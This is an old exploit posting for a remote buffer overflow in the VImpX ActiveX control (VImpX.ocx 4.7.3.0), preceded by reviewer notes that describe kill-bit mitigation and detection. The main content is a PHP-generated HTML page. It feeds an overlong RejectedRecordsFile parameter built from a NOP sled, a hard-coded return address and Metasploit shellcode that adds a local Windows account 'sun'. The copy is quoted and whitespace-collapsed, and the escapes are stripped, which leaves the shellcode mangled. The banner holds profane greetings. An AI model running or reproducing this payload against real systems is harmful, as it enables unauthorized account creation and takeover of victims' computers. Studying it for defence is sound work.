vimpx-overflow.txt
Posted on 16 October 2007
<!--
  Reviewer notes (defensive reading; the listing below is left exactly as posted).

  What this is: a PHP-generated HTML page that instantiates the VImpX ActiveX control
  (classid 7600707B-9F47-416D-8AB5-6FD96EA37968; the banner names VImpX.ocx v. 4.7.3.0) and
  passes one very long string as the RejectedRecordsFile <param>. The banner describes the
  result as a remote buffer overflow. No fixed version is named on this page.

  Payload: the generator comment labels $shellcode as Metasploit win32_adduser
  (USER=sun, PASS=tzu, EXITFUNC=seh, Size=483, Encoder=PexAlphaNum), so the intended effect
  is creation of a local Windows account.

  $eip: the author's comment says it is a "call eax" location in user32.dll. A hard-coded
  system-DLL address presumably ties the listing to one Windows build or patch level
  (assumption, not stated on the page).

  Format: this copy is e-mail quoted (leading ">" markers) and whitespace-collapsed.

  Mitigation: uninstall or update the control. Where it must remain installed, set the kill
  bit for this CLSID (Compatibility Flags = 0x00000400 under
  HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7600707B-9F47-416D-8AB5-6FD96EA37968})
  so Internet Explorer refuses to instantiate it from web content.

  Detection: web or proxy content that references this classid together with an unusually
  long RejectedRecordsFile value. On the host, look for a new local account (the payload
  label names "sun") created by a process descended from the browser.
-->
> <!- > ************************************** > | VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote > Buffer Overflows Exploit (RejectedRecordsFile) > | Code by 'Saw13' > | Software Site: > http://www.dbsoftlab.com/e107_plugins/content/content.php?content.53 > | Special Fuck to : Delta Hacking Security > Team--Farzad Sharifi- All Lashiayne Fucking MemberZ Special TANX : CrazyAngel - snake > *************************************** > -> > <html> > <object > classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' > id='VImpAX1'> > <?php > /* win32_adduser - PASS=tzu EXITFUNC=seh USER=sun > Size=483 Encoder=PexAlphaNum http://metasploit.com */ > $shellcode = > "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". > "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". > "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". > "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". > "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54". > "x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex57". > "x45x50x4ax37x41x50x4fx4ex4bx48x4fx44x4ax51x4bx48". > "x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x43x4bx38". > "x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c". > "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e". > "x46x4fx4bx33x46x35x46x42x46x50x45x47x45x4ex4bx58". > "x4fx35x46x32x41x30x4bx4ex48x56x4bx48x4ex50x4bx54". > "x4bx38x4fx35x4ex41x41x50x4bx4ex4bx38x4ex51x4bx38". > "x41x30x4bx4ex49x38x4ex45x46x42x46x50x43x4cx 41x43". > "x42x4cx46x46x4bx58x42x44x42x33x45x48x42x4cx4ax57". > "x4ex50x4bx38x42x54x4ex30x4bx38x42x37x4ex41x4dx4a". > "x4bx58x4ax36x4ax30x4bx4ex49x50x4bx58x42x38x42x4b". > "x42x50x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x53". > "x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx47". > "x42x45x4ax36x42x4fx4cx58x46x30x4fx45x4ax46x4ax49". > "x50x4fx4cx38x50x30x47x45x4fx4fx47x4ex43x36x4dx56". > "x46x36x50x32x45x46x4ax47x45x56x42x52x4fx52x43x36". > "x42x52x50x46x45x56x46x47x42x52x45x47x43x37x45x56". > "x44x57x42x42x43x57x45x47x50x56x42x52x46x47x4cx37". 
> "x45x47x42x52x4fx42x41x34x46x34x46x54x42x42x48x42". > "x48x32x42x52x50x46x45x36x46x57x42x52x4ex46x4fx36". > "x43x56x41x46x4ex36x47x56x44x47x4fx36x45x57x42x37". > "x42x52x41x54x46x46x4dx56x49x46x50x56x49 x36x43x37". > "x46x47x44x37x41x56x46x47x4fx56x44x37x43x37x42x52". > "x43x57x45x57x50x46x42x42x4fx32x41x34x46x54x46x54". > "x42x50x5a"; > $junk = "x45x45x45x59"; > $eip = "x2dxd1xe0x77"; // call eax user32.dll > $exploit= > str_repeat("x90",268).$eip.$junk."x90x90x90x0dx01".str_repeat("x90",16).$shellcode.str_repeat("x90",9999); > echo "<param name="RejectedRecordsFile" > value="$exploit"/>"; > ?> > </object> > </html>